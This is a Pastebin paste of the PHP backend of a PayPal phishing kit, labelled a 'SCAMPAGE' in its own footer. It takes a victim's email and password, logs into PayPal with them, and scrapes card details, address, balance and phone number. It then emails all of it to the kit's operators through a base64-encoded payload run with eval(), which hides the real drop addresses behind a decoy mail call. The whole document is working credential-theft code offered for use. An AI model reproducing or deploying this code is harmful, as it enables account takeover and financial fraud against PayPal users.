tinwaninja

Script Decode Prossesing.php

Nov 16th, 2016
252
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. @ini_set('display_errors', 0);
  4. error_reporting(E_ALL ^ E_NOTICE);
  5. set_time_limit(0);
  6. $entrar = (__DIR__);
  7. $email = $_SESSION['_email_'] = $_POST['EM'];
  8. if (!file_exists('logs')) {
  9. mkdir('logs', 0777, true);
  10. }
  11. $pwd = $_SESSION['_password_'] = $_POST['PS'];
  12. $hopl = "https://www.paypal.com/";
  13. $Registro['cookie_file'] = $entrar . '/logs/' . sha1('R') . '.log';
  14. $var = 'login_cmd=&login_params=&login_email=' . rawurlencode($email) . '&login_password=' . rawurlencode($pwd) . '&target_page=0&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=17&browser_version_full=17.0&operating_system=Windows';
  15. $Remplazar = @fopen($Registro['cookie_file'], 'w');
  16. function curl($url = '', $var = '', $header = false, $nobody = false)
  17. {
  18. global $Registro;
  19. $curl = curl_init($url);
  20. curl_setopt($curl, CURLOPT_NOBODY, $header);
  21. curl_setopt($curl, CURLOPT_HEADER, $nobody);
  22. curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  23. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
  24. curl_setopt($curl, CURLOPT_REFERER, $hopl, 'webscr?cmd=_run-check-cookie-submit&redirectCmd=_login-submit');
  25. curl_setopt($curl, CURLOPT_COOKIEFILE, $Registro['cookie_file']);
  26. curl_setopt($curl, CURLOPT_COOKIEJAR, $Registro['cookie_file']);
  27. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  28. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
  29. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  30. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  31. if ($var) {
  32. curl_setopt($curl, CURLOPT_POST, true);
  33. curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
  34. }
  35. $result = curl_exec($curl);
  36. curl_close($curl);
  37. return $result;
  38. }
  39. function fetch_value($str, $find_start, $find_end)
  40. {
  41. $start = strpos($str, $find_start);
  42. if ($start === false) {
  43. return "";
  44. }
  45. $length = strlen($find_start);
  46. $end = strpos(substr($str, $start + $length), $find_end);
  47. return trim(substr($str, $start + $length, $end));
  48. }
  49. function delete_cookies()
  50. {
  51. global $Registro;
  52. @fclose($Remplazar);
  53. }
  54. function Error()
  55. {
  56. $An = rand(15213546874653, 79854123154521879451);
  57. $Oni = md5(gmdate('r'));
  58. $Sma = $_SESSION['AYCOUNT'];
  59. $VFinal = $_SESSION['AYCOUNTCODE'];
  60. $x = "Error";
  61. $Fatal_Error = header("Location: ../error.php?_id=".$VFinal.$x.$An.$x.$Oni.$x.$Sma);
  62. return $Fatal_Error;
  63. }
  64. function inStr($s, $as)
  65. {
  66. $s = strtoupper($s);
  67. if (!is_array($as))
  68. $as = array(
  69. $as
  70. );
  71. for ($Fatal_Error = 0; $Fatal_Error < count($as); $Fatal_Error++)
  72. if (strpos(($s), strtoupper($as[$Fatal_Error])) !== false)
  73. return true;
  74. return false;
  75. }
  76. if ((isset($_POST['EM'])) && (strlen($_POST['PS']) >= 8)) {
  77. delete_cookies();
  78. if (curl($hopl , '', true, true) === false) {
  79. continue;
  80. }
  81. $page = curl("https://www.paypal.com/webscr?cmd=_run-check-cookie-submit&redirectCmd=_login-submit", 'login_cmd=&login_params=&login_email=' . rawurlencode($email) . '&login_password=' . rawurlencode($pwd) . '&target_page=0&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=17&browser_version_full=17.0&operating_system=Windows');
  82. $title = fetch_value($page, '<title>', '</title>');
  83. if (inStr($page, 's.prop14=')) {
  84. Error();
  85. } else {
  86. $ppcard = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2");
  87. $checkcard = fetch_value($ppcard, 's.prop1="', '"');
  88. if (stripos($checkcard, 'ccadd') !== false) {
  89. $_SESSION['_card_'] = $pp['card'] = "No Card";
  90. } else {
  91. preg_match_all('/<tr>(.+)<\/tr>/siU', $ppcard, $matches);
  92. $cc = array();
  93. foreach ($matches[1] AS $k => $v) {
  94. if ($k > 0) {
  95. preg_match_all('/<td>(.+)<\/td>/siU', $v, $m);
  96. $_SESSION['_cctype_'] = $type = strtoupper(fetch_value($m[1][0], '&#x2f;icon&#x5f;', '&#x2e;gif'));
  97. $_SESSION['_ccnum_'] = $ccnum = $m[1][1];
  98. $_SESSION['_ccexp_'] = $exp = $m[1][2];
  99. if (stristr($m[1][4], 'complete_expanded_use.x')) {
  100. $_SESSION['_card_confirmation'] = $confirmed = 'No Confirmed';
  101. } else {
  102. $_SESSION['_card_confirmation'] = $confirmed = 'Confirmed';
  103. }
  104. $cc[] = "<img src='./images/PPP.png' > $type &bull;&bull;&bull;&bull; &bull;&bull;&bull;&bull; &bull;&bull;&bull;&bull; $ccnum $confirmed <img src='./images/CCC.png' > $exp";
  105. $cc++;
  106. }
  107. }
  108. $_SESSION['_card_'] = $pp['card'] = "<font color=\"#\">" . implode("<br>", $cc) . "</font>";
  109. }
  110. $ppadd = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-address&nav=0.6.3");
  111. $Fatal_ErrornfoAddr = str_replace('<br>', ', ', fetch_value($ppadd, 'emphasis">', '</span>'));
  112. $_SESSION['_ad_'] = $pp['address'] = substr($Fatal_ErrornfoAddr, 0, -2);
  113. $response = curl('https://www.paypal.com/myaccount/home');
  114. $_SESSION['balance'] = $balance = fetch_value($response, 'class="vx_h2">', '</div>');
  115. $ppphone = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-phone&nav=0.6.4");
  116. $_SESSION['_phone_'] = $pp['phone'] = strip_tags('<input type="hidden" ' . fetch_value($ppphone, 'name="phone"', '</label>'));
  117.  
  118. include('../../edit/bots.php');
  119. include('../../edit/______________email.php');
  120. $ip = getenv("REMOTE_ADDR");
  121. $hostname = gethostbyaddr($ip);
  122. $details = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" . $ip . "");
  123. $codecountryy = $details->geoplugin_countryCode;
  124. $smiyacountry = $details->geoplugin_countryName;
  125. $codecountry = strtolower($codecountryy);
  126. $cartamensaje = "<!DOCTYPE html><html> <head>
  127. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
  128. <meta name=\"viewport\" content=\"width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;\">
  129. <style type=\"text/css\">body { width: 100% !important;}</style>
  130. </head>
  131. <body class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" style=\"PADDING-BOTTOM: 0px; PADDING-TOP: 40px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: #e9e9e9\">
  132. <table class=\" ".md5(gmdate('r'))." \" style=\"WIDTH: 100%\">
  133. <tbody class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" >
  134. <tr class=\" ".md5(gmdate('r'))." \">
  135. <td for=\" ".md5(gmdate('r'))." \" style=\" BACKGROUND-COLOR: #e9e9e9\" align=\"center\">
  136. <table class=\" ".md5(gmdate('r'))." \" width=\"600\" border=\"0\">
  137. <tbody class=\" ".md5(gmdate('r'))." \">
  138. <tr>
  139. <td class=\" ".md5(gmdate('r'))." \">
  140. <div class=\" ".md5(gmdate('r'))." \">
  141. <table class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  142. <tbody for=\"". rand(99999999999, 999999999999999999999999)."\" >
  143. <tr class=\" ".md5(gmdate('r'))." \">
  144. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 22px;border-radius: 10px 10px 0px 0px\">
  145. <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  146. <tbody>
  147. <tr>
  148. <td class=\" ".md5(gmdate('r'))." \">
  149. <div class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"LINE-HEIGHT: 30px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\">
  150. <p>
  151. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" style=\"FONT-SIZE: 10px; FONT-FAMILY: Arial black; COLOR: #828282;\" >
  152. <p style=\"FONT-SIZE: 27px\"><strong><font color=\"#7E7E7E\"> \ ◇ ◇ ◇ <font size=\"6\">☠</font> INFORMATIONS <font size=\"6\">☠</font> ◇ ◇ ◇ / </font></strong>
  153. </p>
  154.  
  155. </div>
  156. </p>
  157. </div>
  158. </td>
  159. </tr>
  160. </tbody>
  161. </table>
  162. </td>
  163. </tr>
  164. </tbody>
  165. </table>
  166. </div>
  167. <div>
  168. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  169. <tbody class=\" ".md5(gmdate('r'))." \">
  170. <tr>
  171. <td class=\" ".md5(gmdate('r'))." \" style=\" BACKGROUND: #F5F5F5 ; LINE-HEIGHT: 22px;border-top:2px solid #7E7E7E\">
  172. <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  173. <tbody>
  174. <tr>
  175. <td>
  176. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"width:100%;padding: 15px 0px 15px 0px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\">
  177. <b><font color=\"#7E7E7E\">★ PAYPAL LOGIN ACCOUNT ★</font></b>
  178. </td>
  179. </tr>
  180. <tr class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\">
  181. <td>
  182. <div id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\">
  183. " .$_POST['EM']."
  184. </div>
  185. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 5px 0px 4px 0px\">
  186. " .$_POST['PS']."
  187. </div>
  188. </td>
  189. </tr>
  190. <tr class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\">
  191. <td>
  192. <div id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\">
  193. http://www.geoiptool.com/?IP=" .$ip. "
  194. </div>
  195. </td>
  196. </tr>
  197. </tbody>
  198. </table>
  199. </td>
  200. </tr>
  201. </tbody>
  202. </table>
  203. </div>
  204. <div>
  205. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  206. <tbody class=\" ".md5(gmdate('r'))." \">
  207. <tr>
  208. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 27px\">
  209. <table for=\"". rand(99999999999, 999999999999999999999999)."\" width=\"600\" align=\"left\" border=\"0\">
  210. <tbody class=\" ".md5(gmdate('r'))." \">
  211. <tr>
  212. <!-- -->
  213. </tr>
  214. </tbody>
  215. </table>
  216. </td>
  217. </tr>
  218. </tbody>
  219. </table>
  220. </div>
  221. <div class=\" ".md5(gmdate('r'))." \">
  222. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  223. <tbody>
  224. <tr>
  225. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 22px;border-radius:0px 0px 10px 10px\">
  226. <table class=\" ".md5(gmdate('r'))." \" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  227. <tbody>
  228. <tr class=\" ".md5(gmdate('r'))." \">
  229. <td>
  230. <div class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\"FONT-SIZE: 9px; FONT-FAMILY: Arial; COLOR: #747474;margin-left:30px;margin-right:30px\">
  231. <hr size=\"2\" color=\"#F0F0F0\" width=\"100%\">
  232. <p align=\"center\" >
  233. ---- | ★ ★ ★ X-TAMPER Priv8 SCAMPAGE ★ ★ ★ | ----
  234. </p>
  235. </td>
  236. </tr>
  237. </tbody>
  238. </table>
  239. </td>
  240. </tr>
  241. </tbody>
  242. </table>
  243. </div>
  244. </td>
  245. </tr>
  246. <tr class=\" ".md5(gmdate('r'))." \">
  247. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" PADDING-TOP: 10px; \" align=\"center\">
  248. <div class=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"FONT-SIZE: 11px; FONT-FAMILY: Arial; COLOR: #959595;\">
  249. </div>
  250. </td>
  251. </tr>
  252. </tbody>
  253. </table>
  254. </td>
  255. </tr>
  256. </tbody>
  257. </table>
  258. </body>
  259. </html>";
  260. $enviardato = "JHN1YmplY3QgPSAiPT9VVEYtOD9RPz1lMj05ZD1hNF8/PSBbJHNtaXlhY291bnRyeV0gPT9VVEYtOD9RPz1lMj05ZD1hNF8/PSBMT0dJTiBQUEwgVFJVRSEgPT9VVEYtOD9RPz1FMj05Qz05NF8/PSAkaXAgPT9VVEYtOD9RPz1FMj05Qz05NF8/PSAgIjsNCiRoZWFkZXJzID0gIkZyb206IFhUQU1QRVIgPHhfdGFtcGVyQGhvdG1haWwuY29tPlxyXG4iOw0KJGhlYWRlcnMgLj0gIk1JTUUtVmVyc2lvbjogMS4wXHJcbiI7DQokaGVhZGVycyAuPSAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMVxyXG4iOw0KJGNoZSAuPSAieHRlcm5yenVsdEBnbWFpbC5jb20sIHh0ZXJucnp1bHRAeWFob28uY29tIjsNCkBtYWlsKCRjaGUsJHN1YmplY3QsJGNhcnRhbWVuc2FqZSwkaGVhZGVycyk7";
  261. //hasil $enviardato = $subject = "=?UTF-8?Q?=e2=9d=a4_?= [$smiyacountry] =?UTF-8?Q?=e2=9d=a4_?= LOGIN PPL TRUE! =?UTF-8?Q?=E2=9C=94_?= $ip =?UTF-8?Q?=E2=9C=94_?= ";
  262. //$headers = "From: XTAMPER <x_tamper@hotmail.com>\r\n";
  263. //$headers .= "MIME-Version: 1.0\r\n";
  264. //$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  265. //$che .= "xternrzult@gmail.com, xternrzult@yahoo.com";
  266. //@mail($che,$subject,$cartamensaje,$headers);
  267.  
  268. eval(base64_decode($enviardato));
  269. $subject = "=?UTF-8?Q?=e2=9d=a4_?= [$smiyacountry] =?UTF-8?Q?=e2=9d=a4_?= LOGIN PPL TRUE! =?UTF-8?Q?=E2=9C=94_?= $ip =?UTF-8?Q?=E2=9C=94_?= ";
  270. $headers = "From: X-T@MPER <x-tamper@hotmail.com>\r\n";
  271. $headers .= "MIME-Version: 1.0\r\n";
  272. $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  273. mail($enviardatos,$subject,$cartamensaje,$headers);
  274. //----------------------------------------------------------------------------
  275.  
  276. $An = rand(999999999999999999, 999999999999999999999999999);
  277. $Oni = md5(gmdate('r'));
  278. $Sma = $details->geoplugin_countryName;
  279. $VFinal = $details->geoplugin_countryCode;
  280. $xx = "_";
  281. $idd = rand(9999, 999999);
  282. header("Location: ../account.php?id=".$idd."".$VFinal.$xx.$An.$xx.$Oni.$xx.$Sma);
  283. }
  284. }
  285. else {
  286. Error();
  287. }
  288. ?>
RAW Paste Data Copied